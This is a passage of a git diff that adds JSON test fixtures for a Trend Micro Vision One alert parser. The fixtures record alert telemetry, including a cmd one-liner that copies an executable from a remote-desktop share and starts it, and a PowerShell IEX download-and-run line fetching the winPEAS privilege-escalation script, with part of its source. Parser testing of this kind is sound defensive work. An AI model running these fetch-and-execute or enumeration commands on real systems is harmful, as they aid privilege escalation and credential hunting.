2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}",
+    "event": {
+      "category": [
+        "intrusion_detection"
+      ],
+      "kind": "alert",
+      "reason": "Process Injection from Windows Temporary Location to System32",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-07-23T07:49:48Z",
+    "host": {
+      "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299",
+      "ip": [
+        "19.112.87.74"
+      ],
+      "name": "CHTX-XMEDICA-2K12.windows10.local"
+    },
+    "observer": {
+      "product": "Vision One",
+      "vendor": "TrendMicro"
+    },
+    "process": {
+      "command_line": "SesProbe-31944.exe ",
+      "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe",
+      "hash": {
+        "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F",
+        "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303"
+      },
+      "parent": {
+        "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S",
+        "executable": "C:\\Windows\\System32\\cmd.exe",
+        "hash": {
+          "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502"
+        }
+      },
+      "pid": 5552
+    },
+    "related": {
+      "hash": [
+        "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F",
+        "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303",
+        "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502"
+      ],
+      "ip": [
+        "19.112.87.74"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "rule": {
+      "name": "Process Injection from Windows Temporary Location to System32"
+    },
+    "trendmicro": {
+      "vision_one": {
+        "alert_id": "WB-11111-22222222-00000",
+        "incident_id": "IC-14558-20240722-00000",
+        "investigation_status": "New",
+        "severity": "medium",
+        "status": "Open"
+      }
+    },
+    "user": {
+      "domain": "windows10",
+      "id": "windows10\\jdoe",
+      "name": "jdoe"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 83d7e99b5..61b294270 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
@@ -20,6 +20,7 @@
       "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0"
     },
     "host": {
+      "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E",
       "ip": [
         "10.10.58.51"
       ],
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
new file mode 100644
index 000000000..e3283fe41
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json	
@@ -0,0 +1,74 @@
+{
+  "input": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n  PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n  For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n  # Default - normal operation with username/password audit in drives/registry\\n  .\\\\winPeas.ps1\\n\\n  # Include Excel files in search: .xls, .xlsx, .xlsm\\n  .\\\\winPeas.ps1 -Excel\\n\\n  # Full audit - normal operation with APIs / Keys / Tokens\\n  ## This will produce false positives ## \\n  .\\\\winPeas.ps1 -FullCheck \\n\\n  # Add Time stamps to each command\\n  .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n  Version:                    1.3\\n  PEASS-ng Original Author:   PEASS-ng\\n  winPEAS.ps1 Author:         @RandolphConley\\n  Creation Date:              10/4/2022\\n  Website:                    https://github.com/peass-ng/PEASS-ng\\n\\n  TESTED: PoSh 5,7\\n  UNTESTED: PoSh 3,4\\n  NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n  [switch]$TimeStamp,\\n  [switch]$FullCheck,\\n  [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n  param(\\n    [string]$title\\n  )\\n  # Match on KB or if patch does not have a KB, return end result\\n  if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n    return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n  }\\n  elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n    return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n  }\\n}\\n\\nFunction Start-ACLCheck {\\n  param(\\n    $Target, $ServiceName)\\n  # Gather ACL of object\\n  if ($null -ne $target) {\\n    try {\\n      $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n    }\\n    catch { $null }\\n    \\n    # If Found, Evaluate Permissions\\n    if ($ACLObject) { \\n      $Identity = @()\\n      $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n      if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n      # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n      whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n      $IdentityFound = $false\\n      foreach ($i in $Identity) {\\n        $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n        $UserPermission = \\\"\\\"\\n        switch -WildCard ($Permission.FileSystemRights) {\\n          \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n          \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n          \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n        }\\n        Switch ($permission.RegistryRights) {\\n          \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n        }\\n        if ($UserPermission) {\\n          if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n          Write-Host -ForegroundColor red  \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n        }\\n      }    \\n      # Identity Found Check - If False, loop through and stop at root of drive\\n      if ($IdentityFound -eq $false) {\\n        if ($Target.Length -gt 3) {\\n          $Target = Split-Path $Target\\n          Start-ACLCheck $Target -ServiceName $ServiceName\\n        }\\n      }\\n    }\\n    else {\\n      # If not found, split path one level and Check again\\n      $Target = Split-Path $Target\\n      Start-ACLCheck $Target $ServiceName\\n    }\\n  }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n  Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n  $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n  if ($($services | Measure-Object).Count -lt 1) {\\n    Write-Host \\\"No unquoted service paths were found\\\";\\n  }\\n  else {\\n    $services | ForEach-Object {\\n      Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n      Write-Host Name: $_.Name\\n      Write-Host PathName: $_.PathName\\n      Write-Host StartName: $_.StartName \\n      Write-Host StartMode: $_.StartMode\\n      Write-Host Running: $_.State\\n    } \\n  }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n  Add-Type -AssemblyName PresentationCore\\n  $text = [Windows.Clipboard]::GetText()\\n  if ($text) {\\n    Write-Host \\\"\\\"\\n    if ($TimeStamp) { TimeElapsed }\\n    Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n    Write-Host $text\\n    \\n  }\\n}\\n\\nFunction Search-Excel {\\n  [cmdletbinding()]\\n  Param (\\n      [parameter(Mandatory, ValueFromPipeline)]\\n      [ValidateScript({\\n          Try {\\n              If (Test-Path -Path $_) {$True}\\n         \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}"
+  },
+  "expected": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n  PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n  For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n  # Default - normal operation with username/password audit in drives/registry\\n  .\\\\winPeas.ps1\\n\\n  # Include Excel files in search: .xls, .xlsx, .xlsm\\n  .\\\\winPeas.ps1 -Excel\\n\\n  # Full audit - normal operation with APIs / Keys / Tokens\\n  ## This will produce false positives ## \\n  .\\\\winPeas.ps1 -FullCheck \\n\\n  # Add Time stamps to each command\\n  .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n  Version:                    1.3\\n  PEASS-ng Original Author:   PEASS-ng\\n  winPEAS.ps1 Author:         @RandolphConley\\n  Creation Date:              10/4/2022\\n  Website:                    https://github.com/peass-ng/PEASS-ng\\n\\n  TESTED: PoSh 5,7\\n  UNTESTED: PoSh 3,4\\n  NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n  [switch]$TimeStamp,\\n  [switch]$FullCheck,\\n  [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n  param(\\n    [string]$title\\n  )\\n  # Match on KB or if patch does not have a KB, return end result\\n  if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n    return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n  }\\n  elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n    return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n  }\\n}\\n\\nFunction Start-ACLCheck {\\n  param(\\n    $Target, $ServiceName)\\n  # Gather ACL of object\\n  if ($null -ne $target) {\\n    try {\\n      $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n    }\\n    catch { $null }\\n    \\n    # If Found, Evaluate Permissions\\n    if ($ACLObject) { \\n      $Identity = @()\\n      $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n      if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n      # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n      whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n      $IdentityFound = $false\\n      foreach ($i in $Identity) {\\n        $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n        $UserPermission = \\\"\\\"\\n        switch -WildCard ($Permission.FileSystemRights) {\\n          \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n          \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n          \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n        }\\n        Switch ($permission.RegistryRights) {\\n          \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n        }\\n        if ($UserPermission) {\\n          if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" 